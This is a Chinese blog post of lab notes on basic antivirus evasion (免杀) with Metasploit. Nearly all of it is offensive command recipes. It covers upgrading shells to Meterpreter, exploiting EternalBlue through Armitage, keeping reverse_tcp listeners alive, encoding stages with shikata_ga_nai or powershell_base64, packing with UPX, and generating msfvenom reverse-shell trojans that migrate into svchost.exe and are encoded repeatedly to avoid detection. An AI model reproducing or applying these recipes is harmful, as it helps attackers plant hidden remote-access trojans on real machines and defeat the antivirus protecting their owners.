网络安全基础免杀

最新推荐文章于 2024-11-12 23:07:13 发布
最新推荐文章于 2024-11-12 23:07:13 发布
阅读量842 收藏 1
点赞数
分类专栏: 零基础学网络安全 基础免杀 渗透测试 文章标签: 网络 web安全 安全 网络安全 网络安全技能树
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxcvbnmasdflzl/article/details/130948825
版权

正文

免杀1

1. 会话提升的几种方式

python -c "import pty;pty.spawn('/bin/bash');" 会话提升

session -u 4      将shell会话提升成meterpreter会话

直接修改payload,原来的设置的payload为shell的木马也能连上

2. armitage的熟悉

apt-get install armitage       安装

armitage   进入界面

不用改直接进入

选择快速查询

输入要查询的地址

nmap出来存活的主机有(1是物理电脑,2是网关,135是linux靶机,254是广播地址,128是win7靶机,129是本机)

拒绝访问打开服务管理器

用所有的漏洞进行探测

搜索ms17

移过去

存在永恒之蓝的漏洞

进行渗透

渗透成功

这里可以设置监听器

3. handler生成监听器的方法

handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp

4. 防止会话假死

show advanced 显示高级参数设置

set ExitOnSession false 监听到shell之后端口继续监听

set SessionCommunicationTimeout 0 设置会话存活时间,默认5分钟

set SessionExpirationTimeout 0 设置会话存活时间,默认一星期

回到顶部

5. 控制台设置编码

EnableStageEncoding 是否允许stage进行编码

StageEncoder 设置要用的编码

优秀的编码:x86/shikata_ga_nai、cmd/powershell_base64

回到顶部

6. upx加壳

加壳

upx -9 qq.exe

-1压缩更快 -9压缩更好

-d解压 -l列表压缩文件

-t测试压缩文件 -V显示版本号

-h给予更多帮助 -L显示软件许可证

测试压缩文件能否运行

upx -t qq.com            OK表示可以运行

回到顶部

7. msfvenom木马payload持久化

(会在运行木马的时候自动迁移到svchost.exe的对应进程中去)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

回到顶部

8. msfvenom木马编码

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe

 

网络安全-生
关注
专栏目录
全套免杀教程+免杀工具合集
08-25
远控免杀专题(1)-基础篇.pdf 远控免杀专题(2)-msfvenom隐藏的参数.pdf 远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf 元控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf 远控免杀专题(5)-Veil免杀(VT免杀率23-...
网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-14 2979
目录一、免杀的概念二、免杀系统搭建三、免杀工具介绍1、myccl2、C32asm3、OD4、LordPE5、ImportREC6、VC++6.0/visual studio7、数字签名四、关于杀软排名不分前后1、360。2、金山毒霸3、江民4、瑞星5、安天防线6、卡巴斯基7、NOD328、诺顿9、小红伞,木伞10、BD五、杀软的查杀方法1、最基础的查杀2.1、静态启发式2.2、动态启发式3、HIPS4、云安全六、免杀方面的术语1、API2、花指令3、输入表4、区段5、加壳6、反启发7、隐藏输入表什么是免杀
网络安全进阶篇之免杀(十四章-5) Golang加载器CS免杀国内主流杀软
划水的小白白
05-30 2338
文章目录一、 概念1.1 360 安全卫士和 360 杀毒1.2 Golang二、前期准备2.1 下载地址三、具体过程3.1 使用CS生成payload3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能
渗透测试web安全 - webshell 免杀 绕过waf总结
网络安全领域优质创作者
02-21 3211
在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。 小型网站常见的waf有: D盾 一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 云锁 云上的安全边界越来越模糊...
免杀技术有一套(免杀方法大集结)
hackzkaq的博客
05-23 7344
基础学黑客,搜索公众号:白帽子左一 00. 概述 什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就知道了。 01. 简介 免杀大概可以分为两种情况: 二进制的免杀(无源
不可不学!一些webshell免杀的技巧
Appleteachers的博客
05-07 890
一些webshell免杀的技巧 0x00:前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行
网络安全相关知识总结,包括网络安全基础Web安全、漏洞复现、等级保护、风险评估、逆向免杀等等
12-06
网络安全相关知识总结,包括网络安全基础Web安全、漏洞复现、等级保护、风险评估、逆向免杀等等
远控免杀源码,最新教程+源码
10-21
网络安全领域,"免杀"(Anti-Virus Evasion)是指让恶意软件能够绕过反病毒软件检测的技术。通常,免杀技术包括混淆、加密、动态加载、多态性等手段,使得恶意代码在执行时不易被反病毒引擎识别。在远程控制软件中...
很强大的的加密免杀工具
11-07
在IT安全领域,免杀工具(Evasion Tool)是一种用于绕过反病毒软件检测的工具。这类工具通常被黑客和安全研究人员使用,以测试软件的防御能力或...因此,理解和掌握免杀技术,对于维护网络安全和打击恶意活动至关重要。
渗透测试行业 网络安全 黑客术语
03-02
免杀**:指恶意软件采用技术手段逃避安全软件的检测。 **35. 加壳**:通过修改恶意软件的编码,使其难以被识别或分析的过程。 **36. 花指令**:通过在恶意软件中添加看似无意义但实际具有迷惑性的代码,使安全...
网络】深入理解 HTTPS:确保数据传输安全的核心协议
人生苦短,睡觉要紧,睡醒再说
11-06 1712
HTTPS(HyperText Transfer Protocol Secure)是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议,而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议,使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息,如登录凭证、支付信息、个人数据等。与 HTTP 协议不同,HTTPS 在数据传输过程中会对信息进行加密,确保数据在传输过程中不被第三方监听或修改。
字节序(Byte Order)
weixin_50993868的博客
11-11 211
字节序与平台字节序转换字节序(Byte Order)是指数据在内存中存储时字节的排列顺序。由于不同的计算机体系结构可能采用不同的字节序,因此理解字节序非常重要,特别是在处理多平台数据传输或存储时。
UNIX 域套接字
weixin_50993868的博客
11-12 204
UNIX 域套接字(UNIX Domain Socket,简称 UDS)是一种在同一台机器上的进程间通信(IPC,Inter-Process Communication)机制,允许不同的进程通过文件系统中的特殊文件进行数据交换,而不需要通过网络协议栈。这使得 UNIX 域套接字在本地通信中比传统的 TCP/IP 套接字更高效。流式数据:和 TCP 套接字类似,UNIX 域套接字也支持面向流的通信(SOCK_STREAM),以及无连接的报文通信(SOCK_DGRAM)。// 套接字文件的路径。
【Linux】网络编程3
最新发布
m0_73839343的博客
11-12 469
该数组里列出这个进程打开的所有文件的文件描述符。数组的下标是文件描述符,是一个整数,而数组的内容是一个指针,指向内核中所有打开的文件的列表,也就是说内核可以通过文件描述符找到对应打开的文件。然后每个文件都有一个inode,Socket 文件的 inode指向了内核中的Socket 结构,在这个结构体里有两个队列,分别是发送队列和接收队列,这个两个队列里面保存的是一个个struct sk_buff,用链表的组织形式串起来。在TCP通信的过程,服务器端会产生两类不同的文件描述符,一个是监听的文件描述符;
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 222
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
Linux:网络协议socket
Au_ust的博客
11-05 1302
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
计算机网络之会话层
一个老Java开发的自白
11-12 659
会话层作为OSI模型的核心层次,承担着建立、管理、维护和终止通信会话的重任。它不仅确保了通信双方的身份验证与授权,还负责参数协商、会话状态管理以及数据流同步等关键功能。通过加密、解密和完整性验证等安全机制,会话层有效保护了数据的隐私和完整性。同时,其层次化、模块化的设计以及面向连接的通信模式,提高了网络通信的可靠性、有序性和并发性。会话层技术正不断向智能化、自动化、安全化方向发展,以适应日益复杂的网络通信需求。未来,会话层将继续与其他层次紧密协同,推动网络通信技术的优化与革新。
蓝队技术学习
weixin_65861348的博客
11-12 671
该手册详细规定了在不同安全事件发生时应执行的标准操作程序,按安全事件类别进行了分类阐述。
06 网络编程基础
Elaine2391的博客
11-07 1069
如果客户端发送的数据没有明确的结束标记,服务器可能会一直等待更多的数据,而客户端则可能因为没有收到响应而卡住。System.out.println("======以下代码是读取响应的结果======");通过这些方法,你可以确保客户端和服务器之间的通信具有明确的数据边界,避免因缺少结束标记而导致的问题。客户端收到服务器的SYN+ACK包后,发送一个ACK(确认)包,确认收到服务器的SYN+ACK包。System.out.println("接收到的数据报:" + message);
域渗透与免杀策略:提升网络安全防护
本文主要探讨了域渗透与免杀对抗的相关技术和...本文是一篇结合实践案例和理论知识的文章,针对域渗透与免杀对抗提供了一套全面的理解框架和技术应对策略,对于IT专业人员和网络安全从业者来说,具有很高的参考价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全-生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值